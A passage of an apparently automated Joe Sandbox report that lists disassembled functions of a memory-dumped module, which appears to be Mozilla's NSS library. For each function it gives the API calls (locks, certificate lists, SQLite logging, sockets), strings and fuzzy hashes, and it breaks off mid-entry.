PR_NewMonitor.NSS3(00000000,?,68DCAA9B,?,?,?,?,?,?,?,00000000,?,68DC80C1), ref: 68DC6855

Part of subcall function 68D88680: calloc.MOZGLUE(00000001,00000028,00000000,-00000001,?,00000000,?,68D355D0,00000000,00000000), ref: 68D8868B
Part of subcall function 68D88680: PR_NewLock.NSS3(00000000,00000000), ref: 68D886A0
Part of subcall function 68D88680: PR_NewCondVar.NSS3(00000000,00000000,00000000), ref: 68D886B2
Part of subcall function 68D88680: PR_NewCondVar.NSS3(00000000,?,00000000,00000000), ref: 68D886C8
Part of subcall function 68D88680: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,00000000), ref: 68D886E2
Part of subcall function 68D88680: malloc.MOZGLUE(00000001,?,?,?,00000000,00000000), ref: 68D886EC
Part of subcall function 68D88680: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,00000000), ref: 68D88700

PR_NewMonitor.NSS3(?,68DCAA9B,?,?,?,?,?,?,?,00000000,?,68DC80C1), ref: 68DC687D

Part of subcall function 68D21770: PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 68D218DE
Part of subcall function 68D21770: InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,000005DC,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 68D218F1

PR_NewMonitor.NSS3(?,68DCAA9B,?,?,?,?,?,?,?,00000000,?,68DC80C1), ref: 68DC688C

Part of subcall function 68D21770: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 68D218FC
Part of subcall function 68D21770: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 68D2198A

PR_NewLock.NSS3 ref: 68DC68A5

Part of subcall function 68DF98D0: calloc.MOZGLUE(00000001,00000084,68D20936,00000001,?,68D2102C), ref: 68DF98E5

PR_NewLock.NSS3 ref: 68DC68B4

Part of subcall function 68DF98D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 68DF9946
Part of subcall function 68DF98D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,68CB16B7,00000000), ref: 68DF994E
Part of subcall function 68DF98D0: free.MOZGLUE(00000000), ref: 68DF995E

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Monitor$ErrorLockcalloc$CondCountCriticalInitializeLastSectionSpinfree$mallocstrcpystrlen
String ID:
API String ID: 200661885-0
Opcode ID: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
Instruction ID: 92a319dca5df91763438c373538c86fdad088fed14708019dc6de4af23f5b1da
Opcode Fuzzy Hash: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
Instruction Fuzzy Hash: F401A8B4A04B07E6EF516B7668203BB66D95F412D8F80453EC679C7280FF61E405CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 68D5ACB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 68D5ACC2

Part of subcall function 68D32F00: PORT_NewArena_Util.NSS3(00000800), ref: 68D32F0A
Part of subcall function 68D32F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 68D32F1D

Part of subcall function 68D32AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,68D30A1B,00000000), ref: 68D32AF0
Part of subcall function 68D32AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 68D32B11

CERT_DestroyCertList.NSS3(00000000), ref: 68D5AD5E

Part of subcall function 68D757D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,68D3B41E,00000000,00000000,?,00000000,?,68D3B41E,00000000,00000000,00000001,?), ref: 68D757E0
Part of subcall function 68D757D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 68D75843

CERT_DestroyCertList.NSS3(?), ref: 68D5AD36

Part of subcall function 68D32F50: CERT_DestroyCertificate.NSS3(?), ref: 68D32F65
Part of subcall function 68D32F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 68D32F83

free.MOZGLUE(?), ref: 68D5AD4F

Strings

@uU~/, xrefs: 68D5ACB8

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID: @uU~/
API String ID: 132756963-2989128320
Opcode ID: cc23192d8d1023ee85a8447b3d14c683daa38607b99638bfd5c9ba0ff70cd9c7
Instruction ID: 71956b0ba2c7d282ffad95ffd38e19445fded2f444e52439f2acbb7b3661f54a
Opcode Fuzzy Hash: cc23192d8d1023ee85a8447b3d14c683daa38607b99638bfd5c9ba0ff70cd9c7
Instruction Fuzzy Hash: B921EEB5C00124CBEF10DF65E8015BE77B4EF0A299F85406AD8197B204FB31A965CBF2

Uniqueness

Uniqueness Score: -1.00%

Function 68CBA8E0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 68DEA480: _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,68E0C3A2,?,?,00000000,00000000), ref: 68DEA528
Part of subcall function 68DEA480: sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 68DEA6E0

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014576,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 68CBA94F

Strings

%s at line %d of [%.10s], xrefs: 68CBA948
@uU~/, xrefs: 68CBA8EA
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 68CBA939
database corruption, xrefs: 68CBA943

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$@uU~/$database corruption
API String ID: 491875419-2452616415
Opcode ID: 4a83dd28843519d1367676d639ff26ee85561d347895045835689833ea1dc2e8
Instruction ID: 703a3019e7a85ca4d83886be36f01c91e7f319ad5cd6119b8085a3e8acc71f29
Opcode Fuzzy Hash: 4a83dd28843519d1367676d639ff26ee85561d347895045835689833ea1dc2e8
Instruction Fuzzy Hash: 96012B32E402049BC7108765DC05B5FB7F4AB85314FC54439E9596B240E771A8058761

Uniqueness

Uniqueness Score: -1.00%

Function 68D88800 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,68D9085A,00000000,?,68D38369,?), ref: 68D88821
TlsGetValue.KERNEL32(?,?,68D9085A,00000000,?,68D38369,?), ref: 68D8883D
EnterCriticalSection.KERNEL32(?,?,?,68D9085A,00000000,?,68D38369,?), ref: 68D88856
PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 68D88887
PR_Unlock.NSS3(?,?,?,?,68D9085A,00000000,?,68D38369,?), ref: 68D88899

Part of subcall function 68D207A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,68CB204A), ref: 68D207AD
Part of subcall function 68D207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,68CB204A), ref: 68D207CD
Part of subcall function 68D207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,68CB204A), ref: 68D207D6
Part of subcall function 68D207A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,68CB204A), ref: 68D207E4
Part of subcall function 68D207A0: TlsSetValue.KERNEL32(00000000,?,68CB204A), ref: 68D20864
Part of subcall function 68D207A0: calloc.MOZGLUE(00000001,0000002C), ref: 68D20880
Part of subcall function 68D207A0: TlsSetValue.KERNEL32(00000000,?,?,68CB204A), ref: 68D208CB
Part of subcall function 68D207A0: TlsGetValue.KERNEL32(?,?,68CB204A), ref: 68D208D7
Part of subcall function 68D207A0: TlsGetValue.KERNEL32(?,?,68CB204A), ref: 68D208FB

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
String ID:
API String ID: 2759447159-0
Opcode ID: 02a19fad0c4ee81dc27fd532347810ad2c7611d610a6ccb9093a048fa06786ed
Instruction ID: 5eb10feb623baff0a97e49bea0540b2bac3e4c56df5c3348bb3c49af675fae39
Opcode Fuzzy Hash: 02a19fad0c4ee81dc27fd532347810ad2c7611d610a6ccb9093a048fa06786ed
Instruction Fuzzy Hash: 38214CB4944605DFDB00AF78E48456EBBB4FF06394F814665DCA897301E730D895CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 68D528A0 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,68D480DD), ref: 68D528BA
EnterCriticalSection.KERNEL32(?,?,?,?,68D480DD), ref: 68D528D3
PR_Unlock.NSS3(?,?,?,?,?,68D480DD), ref: 68D528E8
DeleteCriticalSection.KERNEL32(?,?,?,?,?,68D480DD), ref: 68D5290E
free.MOZGLUE(?,?,?,?,?,?,68D480DD), ref: 68D5291A

Part of subcall function 68D49270: DeleteCriticalSection.KERNEL32(?,?,68D55089,?,68D53B70,?,?,?,?,?,68D55089,68D4F39B,00000000), ref: 68D4927F
Part of subcall function 68D49270: free.MOZGLUE(?,?,68D53B70,?,?,?,?,?,68D55089,68D4F39B,00000000), ref: 68D49286
Part of subcall function 68D49270: PL_HashTableDestroy.NSS3(?,68D53B70,?,?,?,?,?,68D55089,68D4F39B,00000000), ref: 68D49292

Part of subcall function 68D48B50: TlsGetValue.KERNEL32(00000000,?,68D50948,00000000), ref: 68D48B6B
Part of subcall function 68D48B50: EnterCriticalSection.KERNEL32(?,?,?,68D50948,00000000), ref: 68D48B80
Part of subcall function 68D48B50: PL_FinishArenaPool.NSS3(?,?,?,?,68D50948,00000000), ref: 68D48B8F
Part of subcall function 68D48B50: PR_Unlock.NSS3(?,?,?,?,68D50948,00000000), ref: 68D48BA1
Part of subcall function 68D48B50: DeleteCriticalSection.KERNEL32(?,?,?,?,68D50948,00000000), ref: 68D48BAC
Part of subcall function 68D48B50: free.MOZGLUE(?,?,?,?,?,68D50948,00000000), ref: 68D48BB8

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: CriticalSection$Deletefree$EnterUnlockValue$ArenaDestroyFinishHashPoolTable
String ID:
API String ID: 3225375108-0
Opcode ID: 3de86685f2d89b3f0460ce480af12ae821dbb092f26265cca9e8cb84ab1bc09b
Instruction ID: 1cf9dfcc0f8803d9bb899bde2da0011815c24273a1ce076c088d8f722ce5c806
Opcode Fuzzy Hash: 3de86685f2d89b3f0460ce480af12ae821dbb092f26265cca9e8cb84ab1bc09b
Instruction Fuzzy Hash: 1721FCB5A44A059FDB00AF74D08442DBBF4FF0A394F414969DCD997300E734E895CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 68D209E0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,?,?,68D206A2,00000000,?), ref: 68D209F8
malloc.MOZGLUE(0000001F), ref: 68D20A18
memcpy.VCRUNTIME140(?,?,00000001), ref: 68D20A33

Part of subcall function 68D207A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,68CB204A), ref: 68D207AD
Part of subcall function 68D207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,68CB204A), ref: 68D207CD
Part of subcall function 68D207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,68CB204A), ref: 68D207D6
Part of subcall function 68D207A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,68CB204A), ref: 68D207E4
Part of subcall function 68D207A0: TlsSetValue.KERNEL32(00000000,?,68CB204A), ref: 68D20864
Part of subcall function 68D207A0: calloc.MOZGLUE(00000001,0000002C), ref: 68D20880
Part of subcall function 68D207A0: TlsSetValue.KERNEL32(00000000,?,?,68CB204A), ref: 68D208CB
Part of subcall function 68D207A0: TlsGetValue.KERNEL32(?,?,68CB204A), ref: 68D208D7
Part of subcall function 68D207A0: TlsGetValue.KERNEL32(?,?,68CB204A), ref: 68D208FB

PR_Free.NSS3(?), ref: 68D20A6C
PR_Free.NSS3(?), ref: 68D20A87

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Value$Freecalloc$mallocmemcpy
String ID:
API String ID: 207547555-0
Opcode ID: 111f288f993b7ea7626cf43528722587aceef0d9fbc71a1a2294175e23024221
Instruction ID: b509f537244751abc655d7f9384a55897a34e7bca00291b89aeb4a8ba1108349
Opcode Fuzzy Hash: 111f288f993b7ea7626cf43528722587aceef0d9fbc71a1a2294175e23024221
Instruction Fuzzy Hash: A41124B5800B01DBEB109F26D9B472A73A8BB023DCFC05969DA6A42900E730F854CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 68DC2CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 68DC5B40: PR_GetIdentitiesLayer.NSS3 ref: 68DC5B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 68DC2CEC

Part of subcall function 68DDC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 68DDC2BF

PR_EnterMonitor.NSS3(?), ref: 68DC2D02
PR_EnterMonitor.NSS3(?), ref: 68DC2D1F
PR_ExitMonitor.NSS3(?), ref: 68DC2D42
PR_ExitMonitor.NSS3(?), ref: 68DC2D5B

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: ac27df8300c7c43b94600a0f2c4f1eb7e66f1f5c979ef55e4892e9483472455c
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: F101E5F9D10200ABE7309F29FC40B97B7A9EF5939CF801835E85987210D231E9128BB3

Uniqueness

Uniqueness Score: -1.00%

Function 68DD49C0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(000A2CD6,00000000,00000000,00000678,?,?,68DC5F34,00000A20), ref: 68DD49EC

Part of subcall function 68D8FAB0: free.MOZGLUE(?,-00000001,?,?,68D2F673,00000000,00000000), ref: 68D8FAC7

SECITEM_ZfreeItem_Util.NSS3(000A2CEA,00000000,68DC5F34,00000A20,?,?,?,?,?,?,?,?,?,68DCAAD4), ref: 68DD49F9
SECITEM_ZfreeItem_Util.NSS3(000A2CBE,00000000,?,?,68DC5F34,00000A20,?,?,?,?,?,?,?,?,?,68DCAAD4), ref: 68DD4A06
free.MOZGLUE(?,?,?,?,?,68DC5F34,00000A20), ref: 68DD4A16
free.MOZGLUE(000A2CB6,?,?,?,?,68DC5F34,00000A20), ref: 68DD4A1C

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Item_UtilZfreefree
String ID:
API String ID: 2193358613-0
Opcode ID: 263d83ded16fe07bc82df8d7337928e3bf1e553a7a651d1f20b6020b39394aed
Instruction ID: 25d928ec27f735c9999bfe631c1e3e3b1086dadd62abb8378ec4887cc23276bd
Opcode Fuzzy Hash: 263d83ded16fe07bc82df8d7337928e3bf1e553a7a651d1f20b6020b39394aed
Instruction Fuzzy Hash: 310121B6900104DFCB00CF66ECC4C567BBCEF8A25974584A5E909DF201E731E904CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 68CC6C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 68CC6D36

Strings

%s at line %d of [%.10s], xrefs: 68CC6D2F
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 68CC6D20
database corruption, xrefs: 68CC6D2A

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 91aa554b729db573d8fb05723178bcde757c8560bc301f191d1daa9342534cc3
Instruction ID: 713ec8afcd3010fa9d656911a9a2d908dcfd8e549f6f5ee19aa5353009f34a5b
Opcode Fuzzy Hash: 91aa554b729db573d8fb05723178bcde757c8560bc301f191d1daa9342534cc3
Instruction Fuzzy Hash: 91210271A08B049BC3108E1AC940F6AB7F1BF80318FA0452CE9595B750F771E9868792

Uniqueness

Uniqueness Score: -1.00%

Function 68DFCC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 68DFCD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,68DFCC7B), ref: 68DFCD7A
Part of subcall function 68DFCD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 68DFCD8E
Part of subcall function 68DFCD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 68DFCDA5
Part of subcall function 68DFCD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 68DFCDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 68DFCCB5
memcpy.VCRUNTIME140(68E914F4,68E902AC,00000090), ref: 68DFCCD3
memcpy.VCRUNTIME140(68E91588,68E902AC,00000090), ref: 68DFCD2B

Part of subcall function 68D19AC0: socket.WSOCK32(?,00000017,68D199BE), ref: 68D19AE6
Part of subcall function 68D19AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,68D199BE), ref: 68D19AFC

Part of subcall function 68D20590: closesocket.WSOCK32(68D19A8F,?,?,68D19A8F,00000000), ref: 68D20597

Strings

Ipv6_to_Ipv4 layer, xrefs: 68DFCCB0

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: 2da49b09ab800976a4e39f44dc20bb3622967b2ef69eddb52397c830f27fe04f
Instruction ID: 2ba4d236c689ab68204e860e0fe5e866dbd081dbd125ce897be376d95ae90b65
Opcode Fuzzy Hash: 2da49b09ab800976a4e39f44dc20bb3622967b2ef69eddb52397c830f27fe04f
Instruction Fuzzy Hash: E51184B69042409EDF009FD9B842B5E3A9C975B358FA2002BE519CB341E6F9445247E6

Uniqueness

Uniqueness Score: -1.00%

Function 68D48850 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000028,00000000,?,?,68D50715), ref: 68D48859
PR_NewLock.NSS3 ref: 68D48874

Part of subcall function 68DF98D0: calloc.MOZGLUE(00000001,00000084,68D20936,00000001,?,68D2102C), ref: 68DF98E5

PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 68D4888D

Strings

NSS, xrefs: 68D48887

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: calloc$ArenaInitLockPool
String ID: NSS
API String ID: 2230817933-3870390017
Opcode ID: 7ee4d062f660563b3a71158189eb58ed1a3f6c3fc5316d2485548acec823ad3e
Instruction ID: 957b202a6335cef3dbd88a7c3e2c1080657ea8a77754dd289dae7d526d822fe0
Opcode Fuzzy Hash: 7ee4d062f660563b3a71158189eb58ed1a3f6c3fc5316d2485548acec823ad3e
Instruction Fuzzy Hash: 43F0906AEC162037F65027A97C06F5A75889F527EEF840030E91CA76C2FB51A516C7F2

Uniqueness

Uniqueness Score: -1.00%

Function 68E4A860 Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 68E4A690: calloc.MOZGLUE(00000001,00000044,?,?,?,?,68E4A662), ref: 68E4A69E
Part of subcall function 68E4A690: PR_NewCondVar.NSS3(?), ref: 68E4A6B4

PR_IntervalNow.NSS3 ref: 68E4A8C6
EnterCriticalSection.KERNEL32(?), ref: 68E4A8EB
_PR_MD_UNLOCK.NSS3(?), ref: 68E4A944
PR_SetPollableEvent.NSS3(?), ref: 68E4A94F

Memory Dump Source

